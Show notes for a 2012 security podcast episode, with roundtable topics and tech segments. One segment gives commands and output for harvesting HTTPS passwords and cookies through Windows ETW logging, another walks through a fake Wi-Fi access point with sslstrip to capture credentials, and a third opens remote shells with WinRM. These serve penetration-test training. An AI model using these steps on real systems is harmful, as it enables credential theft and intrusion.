Episode300

From Paul's Security Weekly
Jump to: navigation, search

Breast Cancer Research Foundation
Breast Cancer Fund

Click the images to donate now!


Watch the show live below or at http://pauldotcom.com/live August 31, 2012 10AM-6PM EDT

NOTE: The video will play the most recent show up until we are live!


Corporate Sponsors:
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Episode Media Episode 300 Playlist


MP3 pt 1

MP3 pt 2

MP3 pt 3

MP3 pt 4

MP3 pt 5

MP3 pt 6

MP3 pt 7

MP3 pt 8

Show Kick-Off: August 31, 2012 10:00AM EDT

Download Part 1 Audio (mp3)


Introduction

  • Click the links at the top of this page to donate!
  • Welcome the cast: Larry Pesce, Jack Daniel, Allison Nixon, Darren Wigley, Carlos Perez, John Strand
  • Welcome the crew: Dave "The AV Guy" Johnson, Mike "Executive Producer" Perez
  • Welcome the special guests: Alex Horan and Selena Proctor (Core Security Technologies), Ben Jackson, Jason Stallard and Josh Corman
  • Cover schedule for the day

PaulDotCom Security Training Courses

Puzzle Corner with Allison (10:15-10:30AM EDT)

Check back here at the start of the show for a blob of text. This will get you started with the puzzle. If you are some of the first people to solve the puzzle, we may have a position for you here at PaulDotCom (Hint: If you are just starting out and/or looking for an internship type position, be the first person to solve the puzzle!).

The puzzle will begin with base64 encoded text. This is your only hint! The answer will be revealed at the end of the day.

We moved the puzzle to pastebin as it was hogging space on the page. It's also in the historical edits of this page:

http://pastebin.com/60h5vva4


Challenge Answers:

Roundtable: Mobile Security - How Bad Does it Suck and How Do We Fix it? (10:30-11:30 AM EDT)

Watch the Video

Download Audio for This Segment (mp3)

Guests

  • Charlie Miller, Collin Mulliner, Zach Lanier, Josh Wright

Questions/Topics

Without question the security of mobile devices, both old and new, has suffered its share of problems. Since the first phones came on the market sporting the shiny new Bluetooth protocol, attackers moved to take advantage of the mobile device platform (The Cabir worm may be one of the first examples almost 7 years ago to the day). Since then, mobile devices have gained so much more functionality, including Wifi, NFC, SMS (which saw early adoption long before Bluetooth), more robust operating systems, more storage, smaller form factors, and lower cost. Then of course Apple had to get in the mix, then Google, and now, everyone has a smartphone. The really scary part is that we rely on it for communications so heavily, I mean where would we be without a phone that could TXT, email, Tweet and read your Facebook updates? All this functionality has made it essential to have a phone, and even given birth to new buzzwords such as BYOD. With all of this user adoption, functionality, and accessibility comes security FAIL for sure. But:

  • Just how bad does it suck?
  • What are some examples of the latest threats?
  • How likely is it that our phones will be attacked?
  • Some attacks require physical proximity, some do not, what poses the greater risk?
  • Is bandwidth and speed a limiting factor and when will that change?
  • How do we protect our precious smartphones?
  • What can organizations do to protect their users and their data?

Roundtable: End User Security Awareness Training Hot or Not? (11:30-12:30PM EDT)

Watch the Video

Download Audio Version (mp3)

Guests

  • Dave Aitel, Lance Spitzner, Javvad Malik, Dameon Welch-Abernathy (aka "Phoneboy"), SpaceRogue

Questions/Topics

Of all the topics we discussed for this episode none sparked more passionate debate than the effectiveness of end user security awareness training. On one side, its something that we must do in order to help our organization's be resilient to attack. Users must be trained not to "click shit", succumb to social engineering and ignore malicious behavior. On the other side of the fence, its a waste of time. Not all users will "Get it", and the attackers may only need one user to be a victim. The threats are constantly changing, so users will need constant training, and security will just "get in the way". Somewhere in the middle perhaps is a happy medium.

  • Can we do effective user awareness training?
  • What are the things we must have in our security awareness training?
  • Is it bad if we do nothing with respects to user awareness?
  • Should we implement a system of rewards (be malware free and get a free iPad!) or punishment (if malware is on your system you have to watch a 90 minute HR video)?

Break (12:30-12:45 PM EDT)

Stogie Geeks Show (12:45-2:00PM EDT)

Tech Segment: Data Mining Event Tracing for Windows by Mark Baggett (2:00-2:15 PM ET)

In this technical segment we will look at how to tap into the vast amounts of data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW). ETW Provider will sometimes log information excesive amounts of information giving an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.

Segment Media

Video

MP3

About & Why

Would you want to tap the ETW logs? Well, I suppose they could be really useful if you are trying to troubleshoot a system. But more interesting you might tap them if you would like to log Usernames, Password and steal secure cookies. You can even record that information from SSL encrypted channels on remote computers. Sound interesting?

If you haven't already done so first you should check out the post I did back in July on the subject. That link is here.

There I show how you can use the "logman" utility to create an Event trace file and then analyze it with qevtutil.exe. Logman enables ETW logging for a given "ETW Provider" and used with the -o option you can record those events to a log file that can be analyzed with wevtutil.exe. For example, I can capture HTTPS usernames and passwords as users attempt to login to Google for any browser that uses the WinInet API (Yes-IE, No-Firefox,Chrome) with the following commands.

C:\temp>logman create trace MySessionName -p Microsoft-Windows-WinInet -o mylogfile.etw -ets
The command completed successfully.

Now that logging is running we wait for our target to browse to a HTTPS encrypted website and enter their username and password. Once they have logged in we can stop the ETW Session by providing logman with the session name we used to turn on the logging. Then we use wevtutil.exe to dump the contents of the log and find the information we are looking for.

C:\temp>logman stop MySessionName -ets
The command completed successfully.

C:\temp>wevtutil qe mylogfile.etw /lf:True | find /i "passwd"
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-WinIN
Guid='{43d1a55c-76d6-4f7e-995c-64c711e5cafe}'/><EventID>212</EventID><Version>0</Version><Level>5</Level><Task>548</
><Opcode>0</Opcode><Keywords>0x8000020000000002</Keywords><TimeCreated SystemTime='2012-08-29T17:33:40.164114600Z'/>
ntRecordID>3318</EventRecordID><Correlation ActivityID='{00CC000C-FBB0-0278-2007-5408E261E100}'/><Execution ProcessI
824' ThreadID='432' ProcessorID='0' KernelTime='0' UserTime='1'/><Channel></Channel><Computer>workstation7</Computer
curity/></System><EventData><Data Name='RequestHandle'>0xcc000c</Data><Data Name='Length'>243</Data><Data Name='Head
>continue=https%3A%2F%2Fwww.google.com%2F&dsh=-1534317598323818212&hl=en&GALX=AjNqjhAEb0k&pstMsg=1&a
nConn=&checkConnection=youtube%3A281%3A0&checkedDomains=youtube&timeStmp=&secTok=&Email=pauldotc
mp;Passwd=sexysexylarry&signIn=Sign+in&rmShown=1</Data></EventData></Event>

Simple enough, right! You can peer into an established SSL connection and steal active session cookies after you have shell on a box. Even better, logman has the "-s <computername>" option which allows you to enable logging on a remote host with administrative credentials.

But, how did I find that Microsoft-Window-WinInet "provider" name to turn on the logging provider? The command "logman query providers" will generate a list of all the ETW providers on the current system. On my computer there are 636 different logging providers!

C:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"
636

That is alot of logs to check out. Ideally I'd like to turn on ALL the providers, run some programs on the host, and see what kind of treasures lie in each of their logs. Unfortunetly, I didn't see a way to tell logman to enable logging for ALL providers and record everything. If you try to turn them on one at a time you will start having problems after you enable the fifth or sixth provider. Fortunetly netsh also has an interface to enable and disable event tracing for all providers that participate in a given "Scenario". You can tell it you want to use "All" scenarios which enables logging for a large number of providers at the same time.

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING.etl capture=yes correlation=yes

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         FIREEVERYTHING.etl
Append:             Off
Circular:           On
Max Size:           250 MB
Report:             Off

Now you exercise the application that you want to test and see what kind of excessive logging it might be doing. Then you disable your trace session with the command "netsh trace stop". When you do netsh does something very nice. It correlates "like events" and generates several log file and reports containing some interesting data.


C:\temp>netsh trace stop
Correlating traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "C:\temp\FIREEVERYTHING.cab".
File location = C:\temp\FIREEVERYTHING.etl
Tracing session was successfully stopped.

As expected we have our "FIREEVERYTHING.etl" file that we can query with wevtutil.exe. This file will have the information recorded from by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

C:\temp>dir FIREEVERYTHING*.*
 Volume in drive C has no label.
 Volume Serial Number is 2CE0-6D68

 Directory of C:\temp

08/29/2012  01:58 PM           510,144 FIREEVERYTHING.cab
08/29/2012  01:58 PM         3,276,800 FIREEVERYTHING.etl
               2 File(s)      3,786,944 bytes
               0 Dir(s)  13,022,461,952 bytes free


CONTENTS OF FIREEVERYTHING.cab

FREEEVERYTHING.cab.jpg

Now that you can query a larger number of providers, you can cast a large net to identify which providers record high volumes of valuable data. Then you can go back to logman to enable targeted reconnisance data to avoid overwhelming a target. While you are looking through your Event trace file the /f:Text option is useful. It will put the XML Events in a human readable format. Here is the a human readable example.

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True /f:Text | more
Event[0]:
  Log Name: N/A
  Source: Microsoft-Windows-TCPIP
  Date: 2012-08-29T13:57:03.666
  Event ID: 1300
  Task: N/A
  Level: Information
  Opcode: Info
  Keyword: N/A
  User: N/A
  User Name: N/A
  Computer: workstationname
  Description:
TCP: connection 0x8483d678 (local=1.1.1.1:49480 remote=1.1.1.2:445) exists. State = EstablishedState. PID = 4.

However, it does drop some of the details. Some data is only displayed with the XML version is examined. This is important to remember as you are looking for the treasures in the logs. Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrence, but without it finds two.

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True /f:Text | find /c /i "passwd"
0

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True | find /c /i "passwd"
2

These logs are not just recording actions taken by built in programs like Internet Explorer. Any third party tools that rely on the ETW enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!

Installation & Running

All of the tools required to launch this attack are build into Windows 2008, Vista and Later.

Results

Using these tools and doing a little digging you will find that Event tracing is a great way to capture data from a machine that you've compromised.

References

Here are some helpful links:

Logman: http://technet.microsoft.com/en-us/library/cc788036%28WS.10%29.aspx

Wevtutil http://technet.microsoft.com/en-us/library/cc732848%28v=ws.10%29.aspx

Programming with WinINet http://technet.microsoft.com/en-us/subscriptions/aa279322%28v=vs.60%29.aspx

Plugs

Follow me on Twitter @MarkBaggett and Join me for SEC504 Hacker Techniques, Exploits and Incident Handling.

Register here today!

Eighty from Dual Core (2:15PM - 2:45PM EDT)

Roundtable: Defending Your Network - What really works? (3:00-3:45PM EDT)

Guests

  • Wendy Nather, Iftach Amit, David Mortman, Dan Crowley, RSnake

Questions/Topics

"We have a firewall". "All of our systems use Anti-Virus software" "We've implemented the latest web application firewalls and intrusion prevent systems" "We have a patching cycle, weekly maintenance windows and a 30-day patch turn-around" These are things we've all heard before. These are things I often hear right before we are about to start a penetration testing. Depending on how you define success, these things do little to stop attackers.

  • What are we doing wrong when it comes to defense?
  • What is the number one thing that organizations miss when it comes to defense?
  • Should we even bother, and just know that a certain percentage of attackers will be successful?
  • Can't we just do the easy and cheap security "things" and get by as long as we don't get owned as badly as our competition?

Tech Segment: Making Sense of Security Data Using AWESIEM by Conrad Constantine (4:00-4:15 PM EDT)

About & Why

After years of making security databases, I realized that Security Information doesn't match up to the way databases have to be normalized - I started looking at Ontology languages and triple stores instead to store security info, and am now working on an app framework to write security apps using an ontology storage backend, it's called AWESIEM. Here's my intro on how to use ontologies for infosec knowledge.

Demo: simple ontologies and a triple store using SESAME

Installation & Running

Getting SESAME running under TOMCAT, then loading an ontology.

Results

  • Adding some data, and then querying it with SPARQL (think SQL, for semantic data)
  • Reading Ontology data over HTTP
  • Browsing through it visually with SPARQLbrowser
  • Adding new relationships.

References

SESAME: a full-featured, rapid deployment RDF/SPARQL Triple Store http://www.openrdf.org/

Web Ontology Language Specification http://www.w3.org/TR/owl2-overview/

NEoN Toolkit - an IDE for OWL Ontologies. http://neon-toolkit.org

SPARQLBrowers – an AIR client for browsing Ontologies via SPARQL http://code.google.com/p/sparql-browser/

RDFLib - a Python Module to access semantic Data https://github.com/RDFLib

Plugs

http://labs.alienvault.com http://awesiem.net

Tech Segment: Automating Wifi Attacks by John Strand (4:15-4:30 PM ET)

In this Tech Segment we will talk about one of the easiest ways to create an evil access point to steal credentials. We will be using the very cool utility called easy-creds. Which can be found at the link below:

http://code.google.com/p/easy-creds/

There are a number of reasons to use this script. Sure, you can set the whole thing up by hand, but the major goal of any tester should be to automate as much as possible, to make your job as easy as possible. The example we are going to walk through requires you to download the script above and copy it to the /pentest/wireless directory on your backtrack system. We also recommend you get a good wireless card for the task. May we recommend the Alfa AWUS051NH?

First, lets navigate to the directory where you saved easy-creds.sh and start it up:


# cd /pentest/wireless

Start Easy Creds


# ./easy-creds.sh

For this Tech Segment we will be creating an evil wireless access point.

Choose Option 3 FakeAP attacks

you could do evil twin, but that would include some DoS attacks. Instead we will just create a new access point.

Choose Option 1 FakeAP Attack Static

Enter /tmp for the path for saving log files.

Yes.. You do want to include the sidejacking attack Choose y. We do this because we want to include attacks like sslstrip.

Ether eth1 for your Interface connected to the Internet

Choose wlan0 for your wireless interact

Choose a random channel to broadcast on (1-11)

Choose mon0 for your monitor interface

Choose at0 for your tunnel interface

You do not have a dhcp.conf file. Choose n

Enter a network range of 10.10.10.0/24

Enter a DNS server of 8.8.8.8

COUNT TO 45.. Quietly..

Now, if you are playing with this at home, on authorized systems which you own or have permission connect to your access point and google for gmail. Now, click the gmail link and you will be redirected to a version of gmail that is http and not https. Enter some bogus data.

Then...

Choose 4 Data Review

Choose 1 Parse SSLStrip log for accounts

Choose /tmp/easy-creds-[date/TImestamp Remember tab is your friend]/ sslstrip[another date].log

Choose /pentest/wireless/definitions.sslstrip Your passwords should be at the bottom

All to easy.

Tech Segment: Using Windows Remote Manangement for Fun and Profit by Carlos Perez (4:30-4:45PM EDT)

Many times I have heard system Admins talk about setting up OpenSSH on their Windows Machines and in the Times of Windows NT, 2000 and 2003 I did understood the need. Now a days with Windows 2008, Windows 2008 R2 and Windows 2012 Microsoft provides a way for us to administer the boxes remotely using what is called Windows Remote Management of WinRM which is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.

It comes with:

  • Windows 2003 (As a feature that needs to be installed)
  • Windows 2008 (Needs to be enabled)
  • Windows 2008 R2 (Needs to be enabled)
  • Windows 2012 (Enabled by default)

The WinRM service uses the underlying HTTP.sys subsystem in windows to listen to connections on ports 5986 (HTTP) and 5986 (HTTPS). Now we should not afraid of the word HTTP and think it is not secure. In fact all traffic is encrypted and Kerberos in the case of a Domain environment is used for Authentication. In the case of a Workgroup environment NTLMv2 is used for authentication and here HTTPS is recommended.

As part of the commands available to us we have WinRS that allows us to to run remote commands on the host or to open a full interactive shell. For those hosts that may have PowerShell v2 or PowerShell v3 we can use PowerShell Remoting to open a full PowerShell Session to the box.

To enable WinRM on the target with a HTTP listener we just run:

winrm quickconfig -q
It will set the WinRM service to Autostart, create an HTTP listener on all interfaces that do not have a profile of public and it will make the appropriate changes to the Windows Firewall. 

On the client side if we are not in a domain we must modify the client settings to allow us to connect to a machine that is not part of the domain and make it use HTTP to send NTLM Credentials for that we run from a command prompt as Administrator:

winrm set winrm/config/client @{TrustedHosts="RemoteComputerName"}

We could use also wildcards like *.pauldotcom.com or *. Once it is done we can connect an open a session to the target box.

C:\Users\Carlos Perez>winrs -r:http://192.168.1.166:5985 -u:administrator cmd.exe
Enter the password for 'administrator' to connect to 'http://192.168.1.166:5985'
:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator>hostname
WIN-74472FV4AB0

If what we want is a more flexible PowerShell session from within PowerShell we use the Enter-PSSession cmdlet:

PS >Enter-PSSession -ComputerName 192.168.1.166 -Credential administrator
[192.168.1.166]: PS C:\Users\Administrator\Documents> hostname
WIN-74472FV4AB0

If you want to enable WinRM remotely and you can not do it via GPO because probably Bob does not have access to the DC but has credentials to the box we can use PowerShell to use WMI to run the command remotely and enable it for us:

PS > $process = get-wmiobject -query "SELECT * FROM Meta_Class WHERE __Class = 'Win32_Process'" -namespace "root\cimv2" -computername 192.168.1.166 -Credential administrator
PS > $process.Create("cmd.exe /c winrm quickconfig -q")

Configuration Control via GPO

Open Group Policy Manager and open the GPO you want to use.

  • Expand Computer Configuration ->Expand Policies -> Expand Administrative Template -> Expand Windows Components -> Expand Windows Remote Management
  • Select WinRM Client

Enable:

  • Allow automatic configuration of listeners -> provide allowed IP Ranges
  • Allow CredSSP authentication

Disable:

  • Allow Basic Authentication
  • Allow Unencrypted Traffic

To enable WinRM Firewall Exception thru Group Policy for Windows Client OS (Windows Vista, Windows 7 and Windows 8):

  • Open Group Policy Manager and open the GPO you want to use.
  • Expand Computer Configuration ->Expand Policies -> Expand Administrative Template -> Expand Network -> Expand Network Connections -> Expand Windows Firewall
  • Select Domain Profile
  • Enable Define inbound port exceptions:
  • Click on Show
  • Enter 5985:TCP:*:enabled:WinRM
  • Enter 5986:TCP:*:enabled:WinRM(if HTTPS will be configured)
  • Click Ok and Apply

To Control Shell settings when a user uses WinRS or PSSession:

  • Open Group Policy Manager and open the GPO you want to use.
  • Expand Computer Configuration ->Expand Policies -> Expand Administrative Template -> Expand Windows Components
  • Select Windows Remote Shell and set the setting based on your policy

Tech Segment: Larry & Darren Hack Naked At Night (4:45-5:15 PM ET)

PFSense for pentesters

So, we use PFSense every day and love it. I also love the nice red soekris box that we built. After using it day to day, we've found that it is great, and has a few things that drive us nuts. Specifically, when you put two guys behind that doing two pentests or vuln scans, the box just cant stand up unless properly configured.

So, we're gonna to install it on a real PC. This PC we happened to pull from the trash, and is some 64bit AMD system with 2 gig of ram. Total cost? Free. It is probably way more horses than we need for this situation, but is is what we got.

First, go download and burn a copy of PFSense 2.01 from <a href=http://www.pfsense.org/downloads>here.</a>. I know, burn to CD, how retro. Then, boot from CD, and accept the default boot options.

On boot, it will ask to assign some interfaces for WAN and LAN. In our case it would not autodetect either the lan or wan interface, so we just observed the console messages while plugging the cable in and assigned them appropriateley. Once complete it boots into the PFSense menu.

From the menu, we need to do the install with option 99, select the defaults, and wait and reboot.

We've done this part already, as the wait takes a while and makes for crappy TV.

Once we've rebooted, time to hit a shell and change the root password. Once done, I like to enable SSH. if we exit the shell, it might also be a good time to set up our interfaces with option 2. We can now set DHCP, ip addresses and so forth. With this we can Now off to the web configurator!

Some things right off that I like to so once we log in with the default admin/pfsense uaser/password pair, is to change the password. It can be found under System, User Manager, and Edit for the admin user. Don't forget to SAVE.

Next, Turn on HTTPS for the web interface under System, Advanced, and change the Administrative Access to WebConfigurator to HTTPS. Of course, one might want to do that before the password is changed…

Ok, we are allegedly secure!

Next up, some creature conveniences.

Me, I like having PFSense hand out DHCP addresses to LAN clients, and DHCP statically assign addresses to servers and such. But, by default it does not add the DHCP hostnames into the local resolvers. I mean, who can remember all of these numbers. I give these machines names for a reason! Let's enable the adding of the hosts to the local resolver under Services, DNS Forwarder and check Register Leases… and Register Static mappings…

Another one that may be considered a creature comfort (for a home) is a freaking DMZ! Yes, in this box that we are configuring today, it has 5 interfaces. We used the onboard ethernet, and an older Intel 4 port ethernet adapter. (that means the hardware support under PFSense rules.) In our case, we had to bust out the Dremel and cut an aluminum heat sync in half to make this card fit - it got in the way of the sheer size of this card. If you want to add interfaces after the fact, is is fairly easy to do, under Interfaces (assign). It will create the interface with a OPTX name (optional interface), which you can rename from the Interfaces, OPTX menu options. Fixup all your settings, such as a static IP address, and enabling your interface while you are there.

Next up, the single most important option that I've found for using PFSense for pentesting? Firewall Max State Table. The default on my Soekeris box was like 400 states. Run a WAY low and slow Nessus scan? Device tips over. Crank up the sessions so it will work for the same test? 190,000 states? Devices tips over half the time depending on ip range size, this time not on running out states but on RAM and CPU. This is why I'm moving to real hardware… cause I set y state table to 750,000 and have the option to go higher. This can be found under Firewall on the NAT Tab in the Firewall Max States setting. This one you will want to keep an eye on, as the larger the number here, the more memory and CPU it will use. You'll want to keep an eye on this, CPU and Memory, and the tuning of your scans.

Next up, we want to make sure all of our Metasploit shells connect back to us right? We should probably set up a Rule for that. One rule to rule them all. That is under Firewall, NAT 1:1 (if you have multiple external addresses), or Rules, depending on your setup. This should be fairly self explanatory for most of use, or have so many potential options, we could spend all day discussing all of the use cases.

So, with that, go forth, hack naked and keep an eye on your connections.  :-)

Hack your Car with CANBUS

CANBUS hacking…

A little into in a few minutes. yes, as implied, it is a BUS and you can gain access to it from the ODB-II port. Think a hub. All messages on a segment go to all devices on the segment. Messages can be filtered with a gateway (think firewall) between various busses, which may or may not be exposed at the ODB-II port.

Ok, about the messages. A little bit different from networks that we are familliar with. First off, the message do not have source field, but do have a destination in the form of a one byte arbitration ID, these arbitration IDs also indicate priority - the lower the Arbitration ID destination, the higher priority the message. So the ArbID 0 would be processed prior to 73febeef. Now, each message is sent to the bus with an ArbID, and each device LISTENS for specific ArbIDs that is concerned about. With that, Gateways can pass specific messages, and each Device can look for multiple messages. Oh, those messages? Either 11 or 29 bytes, so fairly easy to fuzz.

Ok, so why is this important? Well, I can;t talk about my recent experience as I'm under NDA, but we can think about it form the hacker perspective. Modern cars have 5+ computes that con control a whole bunch of automotive functions from engine control, to door locks to entertainment. Think about how they can interact. Oh, and think about the fiobles that they may have made…such as no authentication to gain access to the bus, no replay protection, and weak challenge response for some functions, flashing over the bus, etc…

How about some hardware? Well, there are a few options. I had some recent experience with the <a href=http://intrepidcs.com/osc_store/index.php/cPath/21>ValueCAN 2 channel </a> at about $400, which is a ODB-II to usb adapter for your computer for use with their free software, VehicleSpy. Now free to sniff traffic, but if you want to inject traffic, you need to register the software, and that will cost $2400. Yikes. Ther are a few things coming form the Goodfet folks, such as Q with his ornithopter release of a goodfet board, specifically for CANBUS. of course I can;t find a link so time for me to get in touch with Q. But, Q's board is intended to be open source and useable for sniff and injection

Ok, great. We can hack our own cars. But think about the current state and future of vehicle computing: in dash computers connected to the internet, on the canbus that could inject/recive traffic as part of it's operation. How about the radio links for upcoming V2V communications for convoys, automatic vehicle control and so forth…yay! Let's connect vehicle controll via CANBUS wirlessly - brakes, engine speed, saftey features…

Now, think about these and think about why and how easy it might be to get into, except for maybe the vehicle. Which of course if you travel a lot, and rent cars…

Go forth and hack.

Roundtable: “Is Pentesting Worth It?” (5:15-6:00 PM ET)

Guests

  • Ed Skoudis, Dave Kennedy, Ron Gula, Weasel

Questions/Topics

Once upon a time a big bad pen tester gets a contract with 3 little pigs, Inc. On the first test, he huffs, and he puffs and blows down the network made of straw. On the next test, you build it out of sticks, and you get the same result (everyone now, he huffs and he puffs and he…). On the next test, you build your network out of bricks, and the big bad pen tester shows up with a wrecking ball, knocks down the house and presents you with an invoice.

(strange sci-fi sound)

In a parallel universe, the big bad pen tester contracts with 3 little pigs inc. The first test the straw house gets knocked down rather fast. But 3 little pigs Inc. gets a report outlining the weaknesses in construction along with recommendations for improvement. The knocking down of the house was a mere simulation, and they are given an opportunity to add a layer to the network, of sticks. The next test the big pad pen tester has to huff and puff, and huff and puff again, simulating another network destruction. No harm is really done, so the process repeats, until a wall of bricks is built. Now the only big bad person able to get through has to really work at it, too much huffing and puffing, and decides to go rob the three little bears instead, using their APT, and eating their IP.

  • First question for the group, 3-5 minutes each, is penetration testing worth it, why or why not?
  • What benefits to you receive from a "good" penetration test and what are the qualities of a "good" penetration test?
  • If someone were to give you a "penetration test", then run a couple of automated tools and provide the stock report, is this a bad thing in all cases?
  • If we don't test our defenses in a controlled experiment, how do we really know they work?
  • Lets say a penetration tester is conducting an internal penetration test, and finds out quickly that more than 50 servers have missing patches for vulnerabilities that lead to a reliable shell. What is the benefit of the penetration test from this point?